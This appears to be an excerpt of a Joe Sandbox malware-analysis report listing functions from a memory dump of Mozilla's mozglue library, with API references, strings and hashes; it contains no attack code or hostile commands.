Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: f8ffd130b540d1622dd6cad74810715579423eb43e2eccc40f7330cdc55ac1c6
Instruction ID: f2c025b6eb9ea565baa2df8d15f82c6db1a81c960568f649629a87da775a8372
Opcode Fuzzy Hash: f8ffd130b540d1622dd6cad74810715579423eb43e2eccc40f7330cdc55ac1c6
Instruction Fuzzy Hash: C23106343006008FD711CF2AC898A6AB7FABF89319F648558E5569BB96CB31EC51CF84

Function 6C65B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C65B532
moz_xmalloc.MOZGLUE(?), ref: 6C65B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C65B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C65B57E
free.MOZGLUE(00000000), ref: 6C65B58F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction ID: 89d8c58b405f94ff87142cdd8ce363126df9faeab29231e2da6d786d2f4b5cda
Opcode Fuzzy Hash: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction Fuzzy Hash: 3D212971A002059BDB00CF69CC80BAEBBB9FF86304F784129E918DB345E736D921C7A5

Function 6C6B6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6B6E78

Part of subcall function 6C6B6A10: InitializeCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6A68
Part of subcall function 6C6B6A10: GetCurrentProcess.KERNEL32 ref: 6C6B6A7D
Part of subcall function 6C6B6A10: GetCurrentProcess.KERNEL32 ref: 6C6B6AA1
Part of subcall function 6C6B6A10: EnterCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6AAE
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6B6AE1
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6B6B15
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C6B6B65
Part of subcall function 6C6B6A10: LeaveCriticalSection.KERNEL32(6C6DF618,?,?), ref: 6C6B6B83

MozFormatCodeAddress.MOZGLUE ref: 6C6B6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6B6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6B6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C6B6EFF

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 52868295192b0fefc6acc7cb5db6232ecb037373e40537bb9ebe56d2a2dce9ae
Instruction ID: 7a861fe4b3ce47c9d7d0582b0418f171e1b28da3ad38869fc556fbcb7c811e64
Opcode Fuzzy Hash: 52868295192b0fefc6acc7cb5db6232ecb037373e40537bb9ebe56d2a2dce9ae
Instruction Fuzzy Hash: 9F21A471A042199FDF04CF69D8C569E77F9EF89308F044039E809A7241DB70AA59CF96

Function 6C690D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C653DEF), ref: 6C690D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C653DEF), ref: 6C690D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C653DEF), ref: 6C690DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C690D97, 6C690DBE
<jemalloc>, xrefs: 6C690D92, 6C690DB9

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction ID: 9eb333f3b368d62e8b1546ca32396374ec09f74a64d74f8d664fc73b983ace28
Opcode Fuzzy Hash: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction Fuzzy Hash: C2F02E3138039623E72016670C0AF6A269EA7C6B35F314035F744DE9C4DA90F80486AE

Function 6C6A7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6A75C4,?), ref: 6C6A762B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7644
GetCurrentThreadId.KERNEL32 ref: 6C6A765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7677

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: ee541756ce323456bcc3d6523245fd4db53dfe164a67086f434006cbe362bdc5
Instruction ID: 6bb646a485ea3ebe2f0a811155d3322491c280c443d3c73ed9b1370723d7e4e5
Opcode Fuzzy Hash: ee541756ce323456bcc3d6523245fd4db53dfe164a67086f434006cbe362bdc5
Instruction Fuzzy Hash: 30F0A471E10786ABD7008F22C888675B778FFEA259F11431AF90543601E7B0B5D18BD5

Function 6C67D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751

Strings

MOZ_CRASH(), xrefs: 6C67D4BB

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction ID: 72be7f876658cff6d62bdf5daf5ff4cfa071adc8b61d5b6b6fcdee3ae64f8576
Opcode Fuzzy Hash: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction Fuzzy Hash: E651A071A047018FD364CF29C49465AB7F1EF89704F558E2ED59AC7B84D770E840CB6A

Function 6C6A4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A4721

Strings

-%llu, xrefs: 6C6A4733
profiler-paused, xrefs: 6C6A46E4
., xrefs: 6C6A476A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 7c47c857322daacc010ec0f4dd803b779c30a42292451004a68c6c0cc5d1a5bb
Instruction ID: d9b877f844518185a66eb8317f8e241a0f0eb0060e8744db4597b5dc4e61bef9
Opcode Fuzzy Hash: 7c47c857322daacc010ec0f4dd803b779c30a42292451004a68c6c0cc5d1a5bb
Instruction Fuzzy Hash: 37418971E047089BCB08CFB9D88116EBBF5EF86744F10863DE85957B41EB70E841874A

Function 6C6A46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A4721

Part of subcall function 6C654410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C693EBD,00000017,?,00000000,?,6C693EBD,?,?,6C6542D2), ref: 6C654444

Strings

-%llu, xrefs: 6C6A4733
profiler-paused, xrefs: 6C6A46E4
., xrefs: 6C6A476A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 26b888f47b694df7ae51fe5d885ae943c1e72917b37d5a576de09379f6fa01ae
Instruction ID: ee623ee0f79995db137349a269ed70c0a4b22cc15c8904805aa0d65b05339753
Opcode Fuzzy Hash: 26b888f47b694df7ae51fe5d885ae943c1e72917b37d5a576de09379f6fa01ae
Instruction Fuzzy Hash: 49312A71F042085BCB08CFADDC812ADBBE6DB89314F55813DE8059BB41EBB0DD058B99

Function 6C6AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C693EBD,6C693EBD,00000000), ref: 6C6542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6AB127), ref: 6C6AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6AB4E4

Strings

pid:, xrefs: 6C6AB4DE

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction ID: 08c90ab0690d7f8403227b0f2834ab55f99ceeb46082f2b9e9c56eb2096e64bc
Opcode Fuzzy Hash: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction Fuzzy Hash: E431E031A0120C9FDB00DFEAD880AEEB7B5FF85318F540529D81267A45D732AD46CBA9

Function 6C69E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69E577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E584
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C69E5A1, 6C69E5CC, 6C69E5FF, 6C69E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C69E722, 6C69E750, 6C69E7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C69E826, 6C69E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C69E655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C69E777

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction ID: 8c3d27a3f7cef48c4ed5c2157a3c3fed9863bba23175123dc71420e2c82529b7
Opcode Fuzzy Hash: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction Fuzzy Hash: 4111AD31A04258DFCB009F16C888B6ABBB4FFC9329F050A19E84587651D774B805CFDE

Function 6C6A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0CD5

Part of subcall function 6C68F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C68F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0D40
free.MOZGLUE ref: 6C6A0DCB

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

free.MOZGLUE ref: 6C6A0DDD
free.MOZGLUE ref: 6C6A0DF2

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction ID: 0744bd5b5f7c2c126cec454ca987b28fa44c9ec751ffde8c5b25c6819782081d
Opcode Fuzzy Hash: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction Fuzzy Hash: 154139719087809BD320DF29C08079AFBE5BFC9714F118A2EE9D987750D770A846CB9B

Function 6C6ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDA4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD158
Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDC4

Part of subcall function 6C6A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6B15FC,?,?,?,?,6C6B15FC,?), ref: 6C6A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACECC

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

Part of subcall function 6C69CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6ACEEA,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000), ref: 6C69CB57
Part of subcall function 6C69CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C69CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6ACEEA,?,?), ref: 6C69CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD058

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction ID: 7f1d13926e85e4132c53c4f335a1232c33e1e35778ffcb01c90bc5c865becd05
Opcode Fuzzy Hash: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction Fuzzy Hash: 2FD16F71A04B469FD708CF28C480B99F7E1BF89308F01866DD95987712EB31B9A6CBC5

Function 6C675C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C675D40
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C675D67
__aulldiv.LIBCMT ref: 6C675DB4
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C675DED

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction ID: d33b4dba655bb99291579b5ea7e7ad6204471695016f9aad492d62ec9b1b7e3c
Opcode Fuzzy Hash: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction Fuzzy Hash: 89518F71E001698FCF08CF69C994AAEBBF1FB85304F198A5DD811A7B50C7307945CB99

Function 6C65CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C65CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C65CF4E

Strings

0, xrefs: 6C65CF30

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction ID: e54310c26906e80553e8d3bb2d46e827d1f78c5d19c18f1187dfef5d907545ba
Opcode Fuzzy Hash: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction Fuzzy Hash: 9D511475A002568FCB00CF18C890A9AFBB5EF99300F29859DD95A5F351D731ED16CBE0

Function 6C696470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6982BC,?,?), ref: 6C69649B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6964A9

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69653F
free.MOZGLUE(?), ref: 6C69655A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction ID: 98cb846002616a141ddfcc5cd91472c026677bdcc18c31a34d08c92d525b97ac
Opcode Fuzzy Hash: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction Fuzzy Hash: 223161B5A04305AFD740CF15D88469AB7E4FF89314F00482EE85A97751DB34E919CBDA

Function 6C66B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C66B4F5
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B502
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B542
free.MOZGLUE(?), ref: 6C66B578

Memory Dump Source

